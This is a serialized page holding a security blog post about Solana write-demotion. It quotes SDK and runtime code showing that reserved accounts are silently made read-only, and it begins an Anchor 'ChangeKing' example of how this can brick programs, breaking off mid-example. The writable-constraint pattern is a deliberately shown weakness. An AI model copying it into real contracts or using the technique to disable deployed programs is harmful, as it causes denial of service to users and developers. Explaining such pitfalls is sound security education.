https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\nimpl LegacyMessage\u003C'_> {\n pub fn new(message: legacy::Message, reserved_account_keys: &HashSet\u003CPubkey>) -> Self {\n let is_writable_account_cache = message\n .account_keys\n .iter()\n .enumerate()\n .map(|(i, _key)| {\n message.is_writable_index(i)\n && !reserved_account_keys.contains(&message.account_keys[i])\n && !message.demote_program_id(i)\n })\n .collect::\u003CVec\u003C_>>();\n Self {\n message: Cow::Owned(message),\n is_writable_account_cache,\n }\n }\n}\n\n// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\npub fn demote_program_id(&self, i: usize) -> bool {\n self.is_key_called_as_program(i) && !self.is_upgradeable_loader_present()\n}\n\n",[81601],{"type":27,"tag":84,"props":81602,"children":81603},{"__ignoreMap":7},[81604,81612,81636,81724,81745,81757,81773,81789,81837,81866,81920,81956,81964,82001,82013,82051,82063,82070,82077,82084,82091,82099,82159,82212],{"type":27,"tag":207,"props":81605,"children":81606},{"class":209,"line":210},[81607],{"type":27,"tag":207,"props":81608,"children":81609},{"style":4647},[81610],{"type":33,"value":81611},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\n",{"type":27,"tag":207,"props":81613,"children":81614},{"class":209,"line":244},[81615,81619,81624,81628,81632],{"type":27,"tag":207,"props":81616,"children":81617},{"style":214},[81618],{"type":33,"value":35460},{"type":27,"tag":207,"props":81620,"children":81621},{"style":8920},[81622],{"type":33,"value":81623}," LegacyMessage",{"type":27,"tag":207,"props":81625,"children":81626},{"style":238},[81627],{"type":33,"value":30195},{"type":27,"tag":207,"props":81629,"children":81630},{"style":8920},[81631],{"type":33,"value":10371},{"type":27,"tag":207,"props":81633,"children":81634},{"style":238},[81635],{"type":33,"value":14563},{"type":27,"tag":207,"props":81637,"children":81638},{"class":209,"line":270},[81639,81643,81647,81651,81655,81659,81663,81668,81672,81677,81681,81686,81690,81694,81699,81703,81707,81711,81715,81720],{"type":27,"tag":207,"props":81640,"children":81641},{"style":214},[81642],{"type":33,"value":28115},{"type":27,"tag":207,"props":81644,"children":81645},{"style":214},[81646],{"type":33,"value":20972},{"type":27,"tag":207,"props":81648,"children":81649},{"style":1335},[81650],{"type":33,"value":1597},{"type":27,"tag":207,"props":81652,"children":81653},{"style":238},[81654],{"type":33,"value":1343},{"type":27,"tag":207,"props":81656,"children":81657},{"style":220},[81658],{"type":33,"value":75270},{"type":27,"tag":207,"props":81660,"children":81661},{"style":226},[81662],{"type":33,"value":736},{"type":27,"tag":207,"props":81664,"children":81665},{"style":238},[81666],{"type":33,"value":81667}," legacy",{"type":27,"tag":207,"props":81669,"children":81670},{"style":226},[81671],{"type":33,"value":10768},{"type":27,"tag":207,"props":81673,"children":81674},{"style":8920},[81675],{"type":33,"value":81676},"Message",{"type":27,"tag":207,"props":81678,"children":81679},{"style":238},[81680],{"type":33,"value":1123},{"type":27,"tag":207,"props":81682,"children":81683},{"style":220},[81684],{"type":33,"value":81685},"reserved_account_keys",{"type":27,"tag":207,"props":81687,"children":81688},{"style":226},[81689],{"type":33,"value":736},{"type":27,"tag":207,"props":81691,"children":81692},{"style":226},[81693],{"type":33,"value":14423},{"type":27,"tag":207,"props":81695,"children":81696},{"style":8920},[81697],{"type":33,"value":81698},"HashSet",{"type":27,"tag":207,"props":81700,"children":81701},{"style":238},[81702],{"type":33,"value":9257},{"type":27,"tag":207,"props":81704,"children":81705},{"style":8920},[81706],{"type":33,"value":28670},{"type":27,"tag":207,"props":81708,"children":81709},{"style":238},[81710],{"type":33,"value":27718},{"type":27,"tag":207,"props":81712,"children":81713},{"style":226},[81714],{"type":33,"value":8968},{"type":27,"tag":207,"props":81716,"children":81717},{"style":214},[81718],{"type":33,"value":81719}," Self",{"type":27,"tag":207,"props":81721,"children":81722},{"style":238},[81723],{"type":33,"value":384},{"type":27,"tag":207,"props":81725,"children":81726},{"class":209,"line":296},[81727,81731,81736,81740],{"type":27,"tag":207,"props":81728,"children":81729},{"style":214},[81730],{"type":33,"value":10353},{"type":27,"tag":207,"props":81732,"children":81733},{"style":220},[81734],{"type":33,"value":81735}," is_writable_account_cache",{"type":27,"tag":207,"props":81737,"children":81738},{"style":226},[81739],{"type":33,"value":229},{"type":27,"tag":207,"props":81741,"children":81742},{"style":220},[81743],{"type":33,"value":81744}," message\n",{"type":27,"tag":207,"props":81746,"children":81747},{"class":209,"line":445},[81748,81752],{"type":27,"tag":207,"props":81749,"children":81750},{"style":226},[81751],{"type":33,"value":10457},{"type":27,"tag":207,"props":81753,"children":81754},{"style":238},[81755],{"type":33,"value":81756},"account_keys\n",{"type":27,"tag":207,"props":81758,"children":81759},{"class":209,"line":867},[81760,81764,81769],{"type":27,"tag":207,"props":81761,"children":81762},{"style":226},[81763],{"type":33,"value":10457},{"type":27,"tag":207,"props":81765,"children":81766},{"style":1335},[81767],{"type":33,"value":81768},"iter",{"type":27,"tag":207,"props":81770,"children":81771},{"style":238},[81772],{"type":33,"value":15018},{"type":27,"tag":207,"props":81774,"children":81775},{"class":209,"line":892},[81776,81780,81785],{"type":27,"tag":207,"props":81777,"children":81778},{"style":226},[81779],{"type":33,"value":10457},{"type":27,"tag":207,"props":81781,"children":81782},{"style":1335},[81783],{"type":33,"value":81784},"enumerate",{"type":27,"tag":207,"props":81786,"children":81787},{"style":238},[81788],{"type":33,"value":15018},{"type":27,"tag":207,"props":81790,"children":81791},{"class":209,"line":1475},[81792,81796,81800,81804,81808,81812,81816,81820,81825,81829,81833],{"type":27,"tag":207,"props":81793,"children":81794},{"style":226},[81795],{"type":33,"value":10457},{"type":27,"tag":207,"props":81797,"children":81798},{"style":1335},[81799],{"type":33,"value":74335},{"type":27,"tag":207,"props":81801,"children":81802},{"style":238},[81803],{"type":33,"value":1343},{"type":27,"tag":207,"props":81805,"children":81806},{"style":226},[81807],{"type":33,"value":17693},{"type":27,"tag":207,"props":81809,"children":81810},{"style":238},[81811],{"type":33,"value":1343},{"type":27,"tag":207,"props":81813,"children":81814},{"style":220},[81815],{"type":33,"value":4690},{"type":27,"tag":207,"props":81817,"children":81818},{"style":238},[81819],{"type":33,"value":1123},{"type":27,"tag":207,"props":81821,"children":81822},{"style":220},[81823],{"type":33,"value":81824},"_key",{"type":27,"tag":207,"props":81826,"children":81827},{"style":238},[81828],{"type":33,"value":10416},{"type":27,"tag":207,"props":81830,"children":81831},{"style":226},[81832],{"type":33,"value":17693},{"type":27,"tag":207,"props":81834,"children":81835},{"style":238},[81836],{"type":33,"value":384},{"type":27,"tag":207,"props":81838,"children":81839},{"class":209,"line":2065},[81840,81845,81849,81854,81858,81862],{"type":27,"tag":207,"props":81841,"children":81842},{"style":220},[81843],{"type":33,"value":81844}," message",{"type":27,"tag":207,"props":81846,"children":81847},{"style":226},[81848],{"type":33,"value":1041},{"type":27,"tag":207,"props":81850,"children":81851},{"style":1335},[81852],{"type":33,"value":81853},"is_writable_index",{"type":27,"tag":207,"props":81855,"children":81856},{"style":238},[81857],{"type":33,"value":1343},{"type":27,"tag":207,"props":81859,"children":81860},{"style":220},[81861],{"type":33,"value":4690},{"type":27,"tag":207,"props":81863,"children":81864},{"style":238},[81865],{"type":33,"value":10449},{"type":27,"tag":207,"props":81867,"children":81868},{"class":209,"line":2092},[81869,81874,81878,81882,81886,81891,81895,81899,81903,81907,81912,81916],{"type":27,"tag":207,"props":81870,"children":81871},{"style":226},[81872],{"type":33,"value":81873}," &&",{"type":27,"tag":207,"props":81875,"children":81876},{"style":226},[81877],{"type":33,"value":20141},{"type":27,"tag":207,"props":81879,"children":81880},{"style":220},[81881],{"type":33,"value":81685},{"type":27,"tag":207,"props":81883,"children":81884},{"style":226},[81885],{"type":33,"value":1041},{"type":27,"tag":207,"props":81887,"children":81888},{"style":1335},[81889],{"type":33,"value":81890},"contains",{"type":27,"tag":207,"props":81892,"children":81893},{"style":238},[81894],{"type":33,"value":1343},{"type":27,"tag":207,"props":81896,"children":81897},{"style":226},[81898],{"type":33,"value":10398},{"type":27,"tag":207,"props":81900,"children":81901},{"style":220},[81902],{"type":33,"value":75270},{"type":27,"tag":207,"props":81904,"children":81905},{"style":226},[81906],{"type":33,"value":1041},{"type":27,"tag":207,"props":81908,"children":81909},{"style":238},[81910],{"type":33,"value":81911},"account_keys[",{"type":27,"tag":207,"props":81913,"children":81914},{"style":220},[81915],{"type":33,"value":4690},{"type":27,"tag":207,"props":81917,"children":81918},{"style":238},[81919],{"type":33,"value":62676},{"type":27,"tag":207,"props":81921,"children":81922},{"class":209,"line":2130},[81923,81927,81931,81935,81939,81944,81948,81952],{"type":27,"tag":207,"props":81924,"children":81925},{"style":226},[81926],{"type":33,"value":81873},{"type":27,"tag":207,"props":81928,"children":81929},{"style":226},[81930],{"type":33,"value":20141},{"type":27,"tag":207,"props":81932,"children":81933},{"style":220},[81934],{"type":33,"value":75270},{"type":27,"tag":207,"props":81936,"children":81937},{"style":226},[81938],{"type":33,"value":1041},{"type":27,"tag":207,"props":81940,"children":81941},{"style":1335},[81942],{"type":33,"value":81943},"demote_program_id",{"type":27,"tag":207,"props":81945,"children":81946},{"style":238},[81947],{"type":33,"value":1343},{"type":27,"tag":207,"props":81949,"children":81950},{"style":220},[81951],{"type":33,"value":4690},{"type":27,"tag":207,"props":81953,"children":81954},{"style":238},[81955],{"type":33,"value":10449},{"type":27,"tag":207,"props":81957,"children":81958},{"class":209,"line":2168},[81959],{"type":27,"tag":207,"props":81960,"children":81961},{"style":238},[81962],{"type":33,"value":81963}," })\n",{"type":27,"tag":207,"props":81965,"children":81966},{"class":209,"line":4095},[81967,81971,81976,81980,81984,81988,81992,81996],{"type":27,"tag":207,"props":81968,"children":81969},{"style":226},[81970],{"type":33,"value":10457},{"type":27,"tag":207,"props":81972,"children":81973},{"style":1335},[81974],{"type":33,"value":81975},"collect",{"type":27,"tag":207,"props":81977,"children":81978},{"style":226},[81979],{"type":33,"value":10768},{"type":27,"tag":207,"props":81981,"children":81982},{"style":238},[81983],{"type":33,"value":9257},{"type":27,"tag":207,"props":81985,"children":81986},{"style":8920},[81987],{"type":33,"value":24484},{"type":27,"tag":207,"props":81989,"children":81990},{"style":238},[81991],{"type":33,"value":9257},{"type":27,"tag":207,"props":81993,"children":81994},{"style":220},[81995],{"type":33,"value":10371},{"type":27,"tag":207,"props":81997,"children":81998},{"style":238},[81999],{"type":33,"value":82000},">>();\n",{"type":27,"tag":207,"props":82002,"children":82003},{"class":209,"line":4103},[82004,82009],{"type":27,"tag":207,"props":82005,"children":82006},{"style":214},[82007],{"type":33,"value":82008}," Self",{"type":27,"tag":207,"props":82010,"children":82011},{"style":238},[82012],{"type":33,"value":384},{"type":27,"tag":207,"props":82014,"children":82015},{"class":209,"line":4154},[82016,82021,82025,82030,82034,82039,82043,82047],{"type":27,"tag":207,"props":82017,"children":82018},{"style":220},[82019],{"type":33,"value":82020}," message",{"type":27,"tag":207,"props":82022,"children":82023},{"style":226},[82024],{"type":33,"value":736},{"type":27,"tag":207,"props":82026,"children":82027},{"style":8920},[82028],{"type":33,"value":82029}," Cow",{"type":27,"tag":207,"props":82031,"children":82032},{"style":226},[82033],{"type":33,"value":10768},{"type":27,"tag":207,"props":82035,"children":82036},{"style":1335},[82037],{"type":33,"value":82038},"Owned",{"type":27,"tag":207,"props":82040,"children":82041},{"style":238},[82042],{"type":33,"value":1343},{"type":27,"tag":207,"props":82044,"children":82045},{"style":220},[82046],{"type":33,"value":75270},{"type":27,"tag":207,"props":82048,"children":82049},{"style":238},[82050],{"type":33,"value":14018},{"type":27,"tag":207,"props":82052,"children":82053},{"class":209,"line":4203},[82054,82059],{"type":27,"tag":207,"props":82055,"children":82056},{"style":220},[82057],{"type":33,"value":82058}," is_writable_account_cache",{"type":27,"tag":207,"props":82060,"children":82061},{"style":238},[82062],{"type":33,"value":1842},{"type":27,"tag":207,"props":82064,"children":82065},{"class":209,"line":4249},[82066],{"type":27,"tag":207,"props":82067,"children":82068},{"style":238},[82069],{"type":33,"value":10637},{"type":27,"tag":207,"props":82071,"children":82072},{"class":209,"line":4290},[82073],{"type":27,"tag":207,"props":82074,"children":82075},{"style":238},[82076],{"type":33,"value":10645},{"type":27,"tag":207,"props":82078,"children":82079},{"class":209,"line":4304},[82080],{"type":27,"tag":207,"props":82081,"children":82082},{"style":238},[82083],{"type":33,"value":451},{"type":27,"tag":207,"props":82085,"children":82086},{"class":209,"line":5466},[82087],{"type":27,"tag":207,"props":82088,"children":82089},{"emptyLinePlaceholder":19},[82090],{"type":33,"value":2062},{"type":27,"tag":207,"props":82092,"children":82093},{"class":209,"line":5530},[82094],{"type":27,"tag":207,"props":82095,"children":82096},{"style":4647},[82097],{"type":33,"value":82098},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\n",{"type":27,"tag":207,"props":82100,"children":82101},{"class":209,"line":7900},[82102,82106,82110,82115,82119,82123,82127,82131,82135,82139,82143,82147,82151,82155],{"type":27,"tag":207,"props":82103,"children":82104},{"style":214},[82105],{"type":33,"value":20967},{"type":27,"tag":207,"props":82107,"children":82108},{"style":214},[82109],{"type":33,"value":20972},{"type":27,"tag":207,"props":82111,"children":82112},{"style":1335},[82113],{"type":33,"value":82114}," demote_program_id",{"type":27,"tag":207,"props":82116,"children":82117},{"style":238},[82118],{"type":33,"value":1343},{"type":27,"tag":207,"props":82120,"children":82121},{"style":226},[82122],{"type":33,"value":10398},{"type":27,"tag":207,"props":82124,"children":82125},{"style":214},[82126],{"type":33,"value":20990},{"type":27,"tag":207,"props":82128,"children":82129},{"style":238},[82130],{"type":33,"value":1123},{"type":27,"tag":207,"props":82132,"children":82133},{"style":220},[82134],{"type":33,"value":4690},{"type":27,"tag":207,"props":82136,"children":82137},{"style":226},[82138],{"type":33,"value":736},{"type":27,"tag":207,"props":82140,"children":82141},{"style":8920},[82142],{"type":33,"value":21008},{"type":27,"tag":207,"props":82144,"children":82145},{"style":238},[82146],{"type":33,"value":2222},{"type":27,"tag":207,"props":82148,"children":82149},{"style":226},[82150],{"type":33,"value":8968},{"type":27,"tag":207,"props":82152,"children":82153},{"style":8920},[82154],{"type":33,"value":19327},{"type":27,"tag":207,"props":82156,"children":82157},{"style":238},[82158],{"type":33,"value":384},{"type":27,"tag":207,"props":82160,"children":82161},{"class":209,"line":7909},[82162,82166,82170,82175,82179,82183,82187,82191,82195,82199,82203,82208],{"type":27,"tag":207,"props":82163,"children":82164},{"style":214},[82165],{"type":33,"value":28058},{"type":27,"tag":207,"props":82167,"children":82168},{"style":226},[82169],{"type":33,"value":1041},{"type":27,"tag":207,"props":82171,"children":82172},{"style":1335},[82173],{"type":33,"value":82174},"is_key_called_as_program",{"type":27,"tag":207,"props":82176,"children":82177},{"style":238},[82178],{"type":33,"value":1343},{"type":27,"tag":207,"props":82180,"children":82181},{"style":220},[82182],{"type":33,"value":4690},{"type":27,"tag":207,"props":82184,"children":82185},{"style":238},[82186],{"type":33,"value":2222},{"type":27,"tag":207,"props":82188,"children":82189},{"style":226},[82190],{"type":33,"value":80428},{"type":27,"tag":207,"props":82192,"children":82193},{"style":226},[82194],{"type":33,"value":20141},{"type":27,"tag":207,"props":82196,"children":82197},{"style":214},[82198],{"type":33,"value":20990},{"type":27,"tag":207,"props":82200,"children":82201},{"style":226},[82202],{"type":33,"value":1041},{"type":27,"tag":207,"props":82204,"children":82205},{"style":1335},[82206],{"type":33,"value":82207},"is_upgradeable_loader_present",{"type":27,"tag":207,"props":82209,"children":82210},{"style":238},[82211],{"type":33,"value":15018},{"type":27,"tag":207,"props":82213,"children":82214},{"class":209,"line":7917},[82215],{"type":27,"tag":207,"props":82216,"children":82217},{"style":238},[82218],{"type":33,"value":451},{"type":27,"tag":36,"props":82220,"children":82221},{},[82222],{"type":33,"value":82223},"As you can see, there are two main causes of write-demotion:",{"type":27,"tag":12719,"props":82225,"children":82226},{},[82227,82239],{"type":27,"tag":1232,"props":82228,"children":82229},{},[82230,82232],{"type":33,"value":82231},"The account appears in the ",{"type":27,"tag":47,"props":82233,"children":82236},{"href":82234,"rel":82235},"https://github.com/anza-xyz/agave/blob/cd76bf6b8da8ec3739f0df4e087de0e50028b034/reserved-account-keys/src/lib.rs#L142-L182",[51],[82237],{"type":33,"value":82238},"reserved account list",{"type":27,"tag":1232,"props":82240,"children":82241},{},[82242],{"type":33,"value":82243},"The account is invoked as a program without the upgradable loader being present in the transaction.",{"type":27,"tag":36,"props":82245,"children":82246},{},[82247],{"type":33,"value":82248},"The second case is generally covered by the executable check implemented previously.",{"type":27,"tag":36,"props":82250,"children":82251},{},[82252],{"type":33,"value":82253},"The first case, however, is far more dangerous — it can silently break your program logic without any obvious cause. Let’s dig deeper into that.",{"type":27,"tag":26163,"props":82255,"children":82257},{"id":82256},"the-reserved-account-list",[82258],{"type":33,"value":82259},"The Reserved Account List",{"type":27,"tag":36,"props":82261,"children":82262},{},[82263,82265,82270],{"type":33,"value":82264},"The Solana runtime maintains a ",{"type":27,"tag":47,"props":82266,"children":82268},{"href":82234,"rel":82267},[51],[82269],{"type":33,"value":82238},{"type":33,"value":82271},", which includes addresses with special semantics — such as built-in programs, precompiles, and sysvars.",{"type":27,"tag":36,"props":82273,"children":82274},{},[82275,82277,82284,82286,82291],{"type":33,"value":82276},"These accounts may initially behave like normal accounts. However, once they become reserved after a ",{"type":27,"tag":47,"props":82278,"children":82281},{"href":82279,"rel":82280},"https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474",[51],[82282],{"type":33,"value":82283},"feature gate is actived",{"type":33,"value":82285},", the runtime will ",{"type":27,"tag":12606,"props":82287,"children":82288},{},[82289],{"type":33,"value":82290},"automatically demote them to read-only",{"type":33,"value":82292},", even if the transaction marked them as writable.",{"type":27,"tag":101,"props":82294,"children":82296},{"className":10270,"code":82295,"language":10269,"meta":7,"style":7},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n// Update active set of reserved account keys which are not allowed to be write locked\nself.reserved_account_keys = {\n let mut reserved_keys = ReservedAccountKeys::clone(&self.reserved_account_keys);\n reserved_keys.update_active_set(&self.feature_set);\n Arc::new(reserved_keys)\n};\n",[82297],{"type":27,"tag":84,"props":82298,"children":82299},{"__ignoreMap":7},[82300,82308,82316,82340,82394,82432,82461],{"type":27,"tag":207,"props":82301,"children":82302},{"class":209,"line":210},[82303],{"type":27,"tag":207,"props":82304,"children":82305},{"style":4647},[82306],{"type":33,"value":82307},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n",{"type":27,"tag":207,"props":82309,"children":82310},{"class":209,"line":244},[82311],{"type":27,"tag":207,"props":82312,"children":82313},{"style":4647},[82314],{"type":33,"value":82315},"// Update active set of reserved account keys which are not allowed to be write locked\n",{"type":27,"tag":207,"props":82317,"children":82318},{"class":209,"line":270},[82319,82323,82327,82332,82336],{"type":27,"tag":207,"props":82320,"children":82321},{"style":214},[82322],{"type":33,"value":20990},{"type":27,"tag":207,"props":82324,"children":82325},{"style":226},[82326],{"type":33,"value":1041},{"type":27,"tag":207,"props":82328,"children":82329},{"style":238},[82330],{"type":33,"value":82331},"reserved_account_keys ",{"type":27,"tag":207,"props":82333,"children":82334},{"style":226},[82335],{"type":33,"value":10380},{"type":27,"tag":207,"props":82337,"children":82338},{"style":238},[82339],{"type":33,"value":384},{"type":27,"tag":207,"props":82341,"children":82342},{"class":209,"line":296},[82343,82347,82351,82356,82360,82365,82369,82373,82377,82381,82385,82389],{"type":27,"tag":207,"props":82344,"children":82345},{"style":214},[82346],{"type":33,"value":10290},{"type":27,"tag":207,"props":82348,"children":82349},{"style":214},[82350],{"type":33,"value":10295},{"type":27,"tag":207,"props":82352,"children":82353},{"style":220},[82354],{"type":33,"value":82355}," reserved_keys",{"type":27,"tag":207,"props":82357,"children":82358},{"style":226},[82359],{"type":33,"value":229},{"type":27,"tag":207,"props":82361,"children":82362},{"style":8920},[82363],{"type":33,"value":82364}," ReservedAccountKeys",{"type":27,"tag":207,"props":82366,"children":82367},{"style":226},[82368],{"type":33,"value":10768},{"type":27,"tag":207,"props":82370,"children":82371},{"style":1335},[82372],{"type":33,"value":22695},{"type":27,"tag":207,"props":82374,"children":82375},{"style":238},[82376],{"type":33,"value":1343},{"type":27,"tag":207,"props":82378,"children":82379},{"style":226},[82380],{"type":33,"value":10398},{"type":27,"tag":207,"props":82382,"children":82383},{"style":214},[82384],{"type":33,"value":20990},{"type":27,"tag":207,"props":82386,"children":82387},{"style":226},[82388],{"type":33,"value":1041},{"type":27,"tag":207,"props":82390,"children":82391},{"style":238},[82392],{"type":33,"value":82393},"reserved_account_keys);\n",{"type":27,"tag":207,"props":82395,"children":82396},{"class":209,"line":445},[82397,82402,82406,82411,82415,82419,82423,82427],{"type":27,"tag":207,"props":82398,"children":82399},{"style":220},[82400],{"type":33,"value":82401}," reserved_keys",{"type":27,"tag":207,"props":82403,"children":82404},{"style":226},[82405],{"type":33,"value":1041},{"type":27,"tag":207,"props":82407,"children":82408},{"style":1335},[82409],{"type":33,"value":82410},"update_active_set",{"type":27,"tag":207,"props":82412,"children":82413},{"style":238},[82414],{"type":33,"value":1343},{"type":27,"tag":207,"props":82416,"children":82417},{"style":226},[82418],{"type":33,"value":10398},{"type":27,"tag":207,"props":82420,"children":82421},{"style":214},[82422],{"type":33,"value":20990},{"type":27,"tag":207,"props":82424,"children":82425},{"style":226},[82426],{"type":33,"value":1041},{"type":27,"tag":207,"props":82428,"children":82429},{"style":238},[82430],{"type":33,"value":82431},"feature_set);\n",{"type":27,"tag":207,"props":82433,"children":82434},{"class":209,"line":867},[82435,82440,82444,82448,82452,82457],{"type":27,"tag":207,"props":82436,"children":82437},{"style":8920},[82438],{"type":33,"value":82439}," Arc",{"type":27,"tag":207,"props":82441,"children":82442},{"style":226},[82443],{"type":33,"value":10768},{"type":27,"tag":207,"props":82445,"children":82446},{"style":1335},[82447],{"type":33,"value":22397},{"type":27,"tag":207,"props":82449,"children":82450},{"style":238},[82451],{"type":33,"value":1343},{"type":27,"tag":207,"props":82453,"children":82454},{"style":220},[82455],{"type":33,"value":82456},"reserved_keys",{"type":27,"tag":207,"props":82458,"children":82459},{"style":238},[82460],{"type":33,"value":10449},{"type":27,"tag":207,"props":82462,"children":82463},{"class":209,"line":892},[82464],{"type":27,"tag":207,"props":82465,"children":82466},{"style":238},[82467],{"type":33,"value":23852},{"type":27,"tag":26163,"props":82469,"children":82471},{"id":82470},"consequences-silent-failures-and-bricked-programs",[82472],{"type":33,"value":82473},"Consequences: Silent Failures and Bricked Programs",{"type":27,"tag":36,"props":82475,"children":82476},{},[82477],{"type":33,"value":82478},"This behavior is especially dangerous when you constrain a program to be writable, for example, with anchor, it's pretty common to use the account(mut) constraint:",{"type":27,"tag":101,"props":82480,"children":82482},{"className":10270,"code":82481,"language":10269,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n #[account(mut)]\n pub throne: Account\u003C'info, Throne>,\n\n #[account(mut, constraint = old_king.key() == throne.king)]\n pub old_king: AccountInfo\u003C'info>,\n\n #[account(mut)]\n pub new_king: AccountInfo\u003C'info>,\n\n #[account(mut)]\n pub payer: Signer\u003C'info>,\n}\n",[82483],{"type":27,"tag":84,"props":82484,"children":82485},{"__ignoreMap":7},[82486,82501,82528,82543,82582,82589,82636,82667,82674,82689,82720,82727,82742,82773],{"type":27,"tag":207,"props":82487,"children":82488},{"class":209,"line":210},[82489,82493,82497],{"type":27,"tag":207,"props":82490,"children":82491},{"style":238},[82492],{"type":33,"value":30110},{"type":27,"tag":207,"props":82494,"children":82495},{"style":8920},[82496],{"type":33,"value":30115},{"type":27,"tag":207,"props":82498,"children":82499},{"style":238},[82500],{"type":33,"value":27530},{"type":27,"tag":207,"props":82502,"children":82503},{"class":209,"line":244},[82504,82508,82512,82516,82520,82524],{"type":27,"tag":207,"props":82505,"children":82506},{"style":214},[82507],{"type":33,"value":20967},{"type":27,"tag":207,"props":82509,"children":82510},{"style":214},[82511],{"type":33,"value":28423},{"type":27,"tag":207,"props":82513,"children":82514},{"style":8920},[82515],{"type":33,"value":78542},{"type":27,"tag":207,"props":82517,"children":82518},{"style":238},[82519],{"type":33,"value":30195},{"type":27,"tag":207,"props":82521,"children":82522},{"style":8920},[82523],{"type":33,"value":30200},{"type":27,"tag":207,"props":82525,"children":82526},{"style":238},[82527],{"type":33,"value":14563},{"type":27,"tag":207,"props":82529,"children":82530},{"class":209,"line":270},[82531,82535,82539],{"type":27,"tag":207,"props":82532,"children":82533},{"style":238},[82534],{"type":33,"value":30402},{"type":27,"tag":207,"props":82536,"children":82537},{"style":214},[82538],{"type":33,"value":11009},{"type":27,"tag":207,"props":82540,"children":82541},{"style":238},[82542],{"type":33,"value":27530},{"type":27,"tag":207,"props":82544,"children":82545},{"class":209,"line":296},[82546,82550,82554,82558,82562,82566,82570,82574,82578],{"type":27,"tag":207,"props":82547,"children":82548},{"style":214},[82549],{"type":33,"value":28115},{"type":27,"tag":207,"props":82551,"children":82552},{"style":220},[82553],{"type":33,"value":78581},{"type":27,"tag":207,"props":82555,"children":82556},{"style":226},[82557],{"type":33,"value":736},{"type":27,"tag":207,"props":82559,"children":82560},{"style":8920},[82561],{"type":33,"value":30367},{"type":27,"tag":207,"props":82563,"children":82564},{"style":238},[82565],{"type":33,"value":30195},{"type":27,"tag":207,"props":82567,"children":82568},{"style":8920},[82569],{"type":33,"value":30200},{"type":27,"tag":207,"props":82571,"children":82572},{"style":238},[82573],{"type":33,"value":1123},{"type":27,"tag":207,"props":82575,"children":82576},{"style":8920},[82577],{"type":33,"value":78606},{"type":27,"tag":207,"props":82579,"children":82580},{"style":238},[82581],{"type":33,"value":13420},{"type":27,"tag":207,"props":82583,"children":82584},{"class":209,"line":445},[82585],{"type":27,"tag":207,"props":82586,"children":82587},{"emptyLinePlaceholder":19},[82588],{"type":33,"value":2062},{"type":27,"tag":207,"props":82590,"children":82591},{"class":209,"line":867},[82592,82596,82600,82604,82608,82612,82616,82620,82624,82628,82632],{"type":27,"tag":207,"props":82593,"children":82594},{"style":238},[82595],{"type":33,"value":30402},{"type":27,"tag":207,"props":82597,"children":82598},{"style":214},[82599],{"type":33,"value":11009},{"type":27,"tag":207,"props":82601,"children":82602},{"style":238},[82603],{"type":33,"value":78641},{"type":27,"tag":207,"props":82605,"children":82606},{"style":226},[82607],{"type":33,"value":10380},{"type":27,"tag":207,"props":82609,"children":82610},{"style":238},[82611],{"type":33,"value":78650},{"type":27,"tag":207,"props":82613,"children":82614},{"style":226},[82615],{"type":33,"value":1041},{"type":27,"tag":207,"props":82617,"children":82618},{"style":238},[82619],{"type":33,"value":78659},{"type":27,"tag":207,"props":82621,"children":82622},{"style":226},[82623],{"type":33,"value":15856},{"type":27,"tag":207,"props":82625,"children":82626},{"style":238},[82627],{"type":33,"value":78581},{"type":27,"tag":207,"props":82629,"children":82630},{"style":226},[82631],{"type":33,"value":1041},{"type":27,"tag":207,"props":82633,"children":82634},{"style":238},[82635],{"type":33,"value":78676},{"type":27,"tag":207,"props":82637,"children":82638},{"class":209,"line":892},[82639,82643,82647,82651,82655,82659,82663],{"type":27,"tag":207,"props":82640,"children":82641},{"style":214},[82642],{"type":33,"value":28115},{"type":27,"tag":207,"props":82644,"children":82645},{"style":220},[82646],{"type":33,"value":78650},{"type":27,"tag":207,"props":82648,"children":82649},{"style":226},[82650],{"type":33,"value":736},{"type":27,"tag":207,"props":82652,"children":82653},{"style":8920},[82654],{"type":33,"value":32663},{"type":27,"tag":207,"props":82656,"children":82657},{"style":238},[82658],{"type":33,"value":30195},{"type":27,"tag":207,"props":82660,"children":82661},{"style":8920},[82662],{"type":33,"value":30200},{"type":27,"tag":207,"props":82664,"children":82665},{"style":238},[82666],{"type":33,"value":13420},{"type":27,"tag":207,"props":82668,"children":82669},{"class":209,"line":1475},[82670],{"type":27,"tag":207,"props":82671,"children":82672},{"emptyLinePlaceholder":19},[82673],{"type":33,"value":2062},{"type":27,"tag":207,"props":82675,"children":82676},{"class":209,"line":2065},[82677,82681,82685],{"type":27,"tag":207,"props":82678,"children":82679},{"style":238},[82680],{"type":33,"value":30402},{"type":27,"tag":207,"props":82682,"children":82683},{"style":214},[82684],{"type":33,"value":11009},{"type":27,"tag":207,"props":82686,"children":82687},{"style":238},[82688],{"type":33,"value":27530},{"type":27,"tag":207,"props":82690,"children":82691},{"class":209,"line":2092},[82692,82696,82700,82704,82708,82712,82716],{"type":27,"tag":207,"props":82693,"children":82694},{"style":214},[82695],{"type":33,"value":28115},{"type":27,"tag":207,"props":82697,"children":82698},{"style":220},[82699],{"type":33,"value":78749},{"type":27,"tag":207,"props":82701,"children":82702},{"style":226},[82703],{"type":33,"value":736},{"type":27,"tag":207,"props":82705,"children":82706},{"style":8920},[82707],{"type":33,"value":32663},{"type":27,"tag":207,"props":82709,"children":82710},{"style":238},[82711],{"type":33,"value":30195},{"type":27,"tag":207,"props":82713,"children":82714},{"style":8920},[82715],{"type":33,"value":30200},{"type":27,"tag":207,"props":82717,"children":82718},{"style":238},[82719],{"type":33,"value":13420},{"type":27,"tag":207,"props":82721,"children":82722},{"class":209,"line":2130},[82723],{"type":27,"tag":207,"props":82724,"children":82725},{"emptyLinePlaceholder":19},[82726],{"type":33,"value":2062},{"type":27,"tag":207,"props":82728,"children":82729},{"class":209,"line":2168},[82730,82734,82738],{"type":27,"tag":207,"props":82731,"children":82732},{"style":238},[82733],{"type":33,"